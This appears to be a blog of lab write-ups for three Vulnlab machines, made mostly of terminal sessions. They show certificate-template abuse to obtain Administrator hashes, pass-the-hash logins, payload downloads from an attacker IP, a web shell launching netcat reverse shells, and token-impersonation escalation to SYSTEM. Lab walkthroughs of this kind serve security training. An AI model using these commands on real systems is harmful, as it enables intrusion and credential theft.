Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
running certipy-ad -find again, we now find
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"

Request Administrator Cert

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace

Fixxed the “NETBIOS connection with the remote host timed out” by changing the order to

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat /etc/hosts | grep sendai
10.10.69.199 sendai.vl dc.sendai.vl

Try again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad req -username clifford.davey@sendai.vl -password RF<REDACTED>3p -ca sendai-DC-CA -target dc.sendai.vl -template SendaiComputer -upn administrator@sendai.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 6
[*] Got certificate with UPN 'administrator@sendai.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

obtain tgt & admin hash

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad auth -pfx administrator.pfx -domain sendai.vl -username administrator -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:cf<REDACTED>7a
                                                                                               
┌──(puck㉿kali)-[~/vulnlab/sendai]
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u administrator -H cf<REDACTED>7a
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> dir


    Directory: C:\Users\Administrator\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/18/2023   6:15 AM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
VL{ae<REDACTED>61}
*Evil-WinRM* PS C:\Users\Administrator\desktop>

That’s all.

Other way to root not finished yet

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ ticketer.py -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
ticketer.py: command not found
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ impacket-ticketer -spn MSSQL/dc.sendai.vl -domain-sid S-1-5-21-3085872742-570972823-736764132 -nthash 57ae3a74ca9345ae52fadc29f178ad11 -dc-ip dc.sendai.vl Administrator -domain sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sendai.vl/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

Set up a chisel listener

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ chisel server -p 8001 --reverse
2024/06/14 08:21:52 server: Reverse tunnelling enabled
2024/06/14 08:21:52 server: Fingerprint 6C2g9JWtYeT92LZsgr5dckEz87F24T+dsXH6dsDjhDo=
2024/06/14 08:21:52 server: Listening on http://0.0.0.0:8001
2024/06/14 08:24:27 server: session#1: Client version (1.9.1) differs from server version (1.9.1-0kali1)
2024/06/14 08:24:27 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

then

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ export KRB5CCNAME=Administrator.ccache          
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains impacket-mssqlclient dc.sendai.vl -k
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.sendai.vl:1433  ...  OK
[*] Encryption required, switching to TLS
                                                                                                         
┌──(puck㉿kali)-[~/vulnlab/sendai]

and from sendai box

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload chisel.exe
                                        
Info: Uploading /home/puck/vulnlab/sendai/chisel.exe to C:\temp\chisel.exe
                                        
Data: 12008104 bytes of 12008104 bytes copied
                                        
Info: Upload successful!

*Evil-WinRM* PS C:\temp> ./chisel.exe client 10.8.2.138:8001 R:1080:socks
chisel.exe : 2024/06/14 05:24:26 client: Connecting to ws://10.8.2.138:8001
    + CategoryInfo          : NotSpecified: (2024/06/14 05:2...10.8.2.138:8001:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
2024/06/14 05:24:26 client: Connected (Latency 20.3373ms)

work in progress

as chisel is working fine

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ proxychains curl http://127.0.0.1     
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  127.0.0.1:80  ...  OK
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
    color:#000000;
    background-color:#0072C6;
    margin:0;
}

#container {
    margin-left:auto;
    margin-right:auto;
    text-align:center;
    }

a img {
    border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>
</html>                                                                                                                             
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ 

someting must be wrong with my impacket-mssqlclient Encryption required, switching to TLS

 

vulnlab-media

vulnlab media

a medium Windows machine

Tools used : ntlm_theft , fullpowers.exe , godpotato.exe

1st upload a video file ,catch the hash with Responder, and crack it with John

then ssh into the box

examine index.php , and query ApacheServer for a clue what todo

PS C:\xampp\htdocs> reg query "HKLM\SYSTEM\CurrentControlSet\services\ApacheHTTPServer"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer
    Type    REG_DWORD    0x10
    Start    REG_DWORD    0x2
    ErrorControl    REG_DWORD    0x1
    ImagePath    REG_EXPAND_SZ    "C:\Xampp\apache\bin\httpd.exe" -k runservice
    DisplayName    REG_SZ    Apache HTTP Server
    DependOnService    REG_MULTI_SZ    Tcpip\0Afd
    ObjectName    REG_SZ    NT AUTHORITY\Local Service
    Description    REG_SZ    Apache/2.4.56 (Win64)
    FailureActions    REG_BINARY    0000000000000000000000000300000014000000010000001400000001000000140000000100000014000000
    RequiredPrivileges    REG_MULTI_SZ    SeChangeNotifyPrivilege\0SeCreateGlobalPrivilege\0SeIncreaseWorkingSetPrivilege\0SeTcbPrivilege\0SeTimeZonePrivilege

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\ApacheHTTPServer\Parameters
PS C:\xampp\htdocs> cat index.php                                                                                    
<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

 

make everything ready as below

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ ssh enox@media.vl
enox@media.vl's password: 

Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

enox@MEDIA C:\Users\enox>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

enox@MEDIA C:\Users\enox>cd cd:\xamp
The filename, directory name, or volume label syntax is incorrect.

enox@MEDIA C:\Users\enox>cd c:\

enox@MEDIA c:\>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\

05/08/2021  01:20 AM    <DIR>          PerfLogs
10/10/2023  06:32 AM    <DIR>          Program Files
05/08/2021  02:40 AM    <DIR>          Program Files (x86)
10/02/2023  10:26 AM    <DIR>          Users
10/10/2023  06:41 AM    <DIR>          Windows
10/02/2023  11:03 AM    <DIR>          xampp
               0 File(s)              0 bytes
               6 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\>cd xampp

enox@MEDIA c:\xampp>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp

10/02/2023  11:03 AM    <DIR>          .
10/02/2023  10:57 AM    <DIR>          apache
06/07/2013  11:15 AM               436 apache_start.bat
10/01/2019  07:13 AM               190 apache_stop.bat
04/05/2021  04:16 PM            10,324 catalina_service.bat
04/05/2021  04:17 PM             3,766 catalina_start.bat
04/05/2021  04:17 PM             3,529 catalina_stop.bat
10/02/2023  10:57 AM    <DIR>          cgi-bin
10/02/2023  10:57 AM    <DIR>          contrib
10/02/2023  10:57 AM    <DIR>          FileZillaFTP
10/02/2023  10:27 AM    <DIR>          htdocs
10/02/2023  10:57 AM    <DIR>          install
10/02/2023  10:57 AM    <DIR>          licenses
10/02/2023  10:57 AM    <DIR>          locale
10/02/2023  10:57 AM    <DIR>          MercuryMail
10/02/2023  10:57 AM    <DIR>          mysql
06/03/2019  11:39 AM               471 mysql_start.bat
10/01/2019  07:13 AM               270 mysql_stop.bat
03/13/2017  11:04 AM               824 passwords.txt
10/02/2023  10:58 AM    <DIR>          perl
10/02/2023  11:01 AM    <DIR>          php
10/02/2023  11:03 AM    <DIR>          phpMyAdmin
04/06/2023  09:04 AM             7,653 readme_de.txt
04/06/2023  09:04 AM             7,515 readme_en.txt
10/02/2023  11:03 AM    <DIR>          sendmail
11/12/2015  05:13 PM               370 setup_xampp.bat
11/29/2020  02:38 PM             1,671 test_php.bat
06/13/2024  06:46 AM    <DIR>          tmp
10/02/2023  11:03 AM    <DIR>          tomcat
10/02/2023  11:03 AM    <DIR>          webalizer
10/02/2023  11:03 AM    <DIR>          webdav
04/06/2021  11:38 AM         3,368,448 xampp-control.exe
04/05/2021  04:08 PM               978 xampp-control.ini
03/30/2013  12:29 PM           118,784 xampp_start.exe
03/30/2013  12:29 PM           118,784 xampp_stop.exe
              16 File(s)      3,644,013 bytes
              19 Dir(s)   8,501,637,120 bytes free

enox@MEDIA c:\xampp>cd htdocs

enox@MEDIA c:\xampp\htdocs>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of c:\xampp\htdocs

10/02/2023  10:27 AM    <DIR>          .
10/02/2023  11:03 AM    <DIR>          ..
10/02/2023  10:27 AM    <DIR>          assets
10/02/2023  10:27 AM    <DIR>          css
10/10/2023  05:00 AM            20,563 index.php
10/02/2023  10:27 AM    <DIR>          js
               1 File(s)         20,563 bytes
               5 Dir(s)   8,501,620,736 bytes free

enox@MEDIA c:\xampp\htdocs>cd C:\Windows\Tasks\Uploads\

enox@MEDIA C:\Windows\Tasks\Uploads>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads

06/13/2024  06:46 AM    <DIR>          .
10/02/2023  11:04 AM    <DIR>          ..
06/13/2024  06:46 AM    <DIR>          1bad4a5f2408292f03b2bfc5a1edd51d
06/13/2024  06:46 AM                 0 todo.txt
               1 File(s)              0 bytes
               3 Dir(s)   8,501,604,352 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d
The directory is not empty.

enox@MEDIA C:\Windows\Tasks\Uploads>cd 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>dir
 Volume in drive C has no label.
 Volume Serial Number is EAD8-5D48

 Directory of C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d

06/13/2024  06:46 AM    <DIR>          .
06/13/2024  06:46 AM    <DIR>          ..
06/13/2024  06:46 AM                37 shell.php
               1 File(s)             37 bytes
               2 Dir(s)   8,499,552,256 bytes free

enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>del *.*   
           C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d\*.*, Are you sure (Y/N)? y                                                                                                                                                      enox@MEDIA C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d>cd ..                                           

enox@MEDIA C:\Windows\Tasks\Uploads>rmdir 1bad4a5f2408292f03b2bfc5a1edd51d

enox@MEDIA C:\Windows\Tasks\Uploads>cd C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mklink /J C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d C:\xampp\htdocs
Junction created for C:\Windows\Tasks\Uploads\1bad4a5f2408292f03b2bfc5a1edd51d <<===>> C:\xampp\htdocs

enox@MEDIA C:\xampp\htdocs>mkdir c:\temp

enox@MEDIA C:\xampp\htdocs>cd c:\temp

enox@MEDIA c:\temp> powershell                                      
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  iwr http://10.8.2.138/nc64.exe -outfile nc64.exe
PS C:\temp>  iwr http://10.8.2.138/FullPowers.exe -outfile FullPowers.exe 
PS C:\temp> iwr http://10.8.2.138/GodPotato.exe -outfile gp.exe

upload the shell.php again ( with same name ) on the website http://media.vl

trigger the shell

──(puck㉿kali)-[~/vulnlab/media]
└─$ curl http://media.vl/shell.php?cmd=c:\\temp\\nc64.exe+-e+cmd.exe+10.8.2.138+443

.

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50353
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\xampp\htdocs>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State   
============================= =================================== ========
SeTcbPrivilege                Act as part of the operating system Disabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled 
SeCreateGlobalPrivilege       Create global objects               Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set      Disabled
SeTimeZonePrivilege           Change the time zone                Disabled


C:\xampp\htdocs>cd c:\temp
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> ./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
./FullPowers.exe -c "C:\temp\nc64.exe 10.8.2.138 443 -e cmd" -z
[+] Started dummy thread with id 4104
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
PS C:\temp> 

having another listening running

┌──(puck㉿kali)-[~/vulnlab/media]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50388
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /all
whoami /all

USER INFORMATION
----------------

User Name                  SID     
========================== ========
nt authority\local service S-1-5-19


GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                                                              Attributes                                        
====================================== ================ ================================================================================================ ==================================================
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                                                                                                       
Everyone                               Well-known group S-1-1-0                                                                                          Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545                                                                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                   Well-known group S-1-5-6                                                                                          Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1                                                                                          Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15                                                                                         Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-87-343222087-845000640-1675840783-1352364494-2876961185                                    Enabled by default, Enabled group, Group owner    
LOCAL                                  Well-known group S-1-2-0                                                                                          Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674   Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263 Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053    Mandatory group, Enabled by default, Enabled group
                                       Unknown SID type S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462   Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled


C:\Windows\system32>cd c:\temp 
cd c:\temp

c:\temp>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp>  .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
 .\gp.exe -cmd "C:\temp\nc64.exe -e cmd.exe 10.8.2.138 443"
[*] CombaseModule: 0x140703281709056
[*] DispatchTable: 0x140703284300104
[*] UseProtseqFunction: 0x140703283594576
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\4fd8aaea-891f-4482-ad8b-475ee0150221\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00004c02-0f7c-ffff-c191-3eab1219bded
[*] DCOM obj OXID: 0xd4bc6315c97087dc
[*] DCOM obj OID: 0x8e7f990db6fe9b40
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 904 Token:0x740  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 5052


and having again another listener running

┌──(puck㉿kali)-[~/.john]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.95.210] 50461
Microsoft Windows [Version 10.0.20348.1970]
(c) Microsoft Corporation. All rights reserved.

C:\temp>whoami
whoami
nt authority\system

C:\temp>hostname
hostname
MEDIA

C:\temp>

That’s it

Tools used on this box:

GodPotato

FullPowers

ntlm_theft

 

 

.

 

vulnlab-delegate

vulnlab-delegate

a hard machine

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-lookupsid guest@delegate.vl 10000                   
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Brute forcing SIDs at delegate.vl
[*] StringBinding ncacn_np:delegate.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1484473093-3449528695-2030935120
498: DELEGATE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: DELEGATE\Administrator (SidTypeUser)
501: DELEGATE\Guest (SidTypeUser)
502: DELEGATE\krbtgt (SidTypeUser)
512: DELEGATE\Domain Admins (SidTypeGroup)
513: DELEGATE\Domain Users (SidTypeGroup)
514: DELEGATE\Domain Guests (SidTypeGroup)
515: DELEGATE\Domain Computers (SidTypeGroup)
516: DELEGATE\Domain Controllers (SidTypeGroup)
517: DELEGATE\Cert Publishers (SidTypeAlias)
518: DELEGATE\Schema Admins (SidTypeGroup)
519: DELEGATE\Enterprise Admins (SidTypeGroup)
520: DELEGATE\Group Policy Creator Owners (SidTypeGroup)
521: DELEGATE\Read-only Domain Controllers (SidTypeGroup)
522: DELEGATE\Cloneable Domain Controllers (SidTypeGroup)
525: DELEGATE\Protected Users (SidTypeGroup)
526: DELEGATE\Key Admins (SidTypeGroup)
527: DELEGATE\Enterprise Key Admins (SidTypeGroup)
553: DELEGATE\RAS and IAS Servers (SidTypeAlias)
571: DELEGATE\Allowed RODC Password Replication Group (SidTypeAlias)
572: DELEGATE\Denied RODC Password Replication Group (SidTypeAlias)
1000: DELEGATE\DC1$ (SidTypeUser)
1101: DELEGATE\DnsAdmins (SidTypeAlias)
1102: DELEGATE\DnsUpdateProxy (SidTypeGroup)
1104: DELEGATE\A.Briggs (SidTypeUser)
1105: DELEGATE\b.Brown (SidTypeUser)
1106: DELEGATE\R.Cooper (SidTypeUser)
1107: DELEGATE\J.Roberts (SidTypeUser)
1108: DELEGATE\N.Thompson (SidTypeUser)
1121: DELEGATE\delegation admins (SidTypeGroup)
                                          

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ impacket-GetNPUsers delegate.vl/puck -usersfile users.txt -dc-ip dc1.delegate.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] User A.Briggs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User b.Brown doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User R.Cooper doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User J.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User N.Thompson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax

.

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ smbclient //delegate.vl/SYSVOL -U puck             
Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Sep  9 09:52:30 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  delegate.vl                        Dr        0  Sat Aug 26 05:39:25 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \> cd delegate.vl\
smb: \delegate.vl\> ls
  .                                   D        0  Sat Aug 26 05:45:45 2023
  ..                                  D        0  Sat Aug 26 05:39:25 2023
  DfsrPrivate                      DHSr        0  Sat Aug 26 05:45:45 2023
  Policies                            D        0  Sat Aug 26 05:39:30 2023
  scripts                             D        0  Sat Aug 26 08:45:24 2023

        5242879 blocks of size 4096. 1960185 blocks available
smb: \delegate.vl\> cd scripts
smb: \delegate.vl\scripts\> ls
  .                                   D        0  Sat Aug 26 08:45:24 2023
  ..                                  D        0  Sat Aug 26 05:45:45 2023
  users.bat                           A      159  Sat Aug 26 08:54:29 2023

        5242879 blocks of size 4096. 1960182 blocks available
smb: \delegate.vl\scripts\> get users.bat
getting file \delegate.vl\scripts\users.bat of size 159 as users.bat (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \delegate.vl\scripts\> 


┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ cat users.bat 
rem @echo off
net use * /delete /y
net use v: \\dc1\development 

if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123

Bloodhound to get more info

┌──(puck㉿kali)-[~/vulnhub/delegate]
└─$ bloodhound-python -d delegate.vl -c all -u 'A.Briggs' -p 'P4ssw0rd1#123' -ns 10.10.114.169      
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
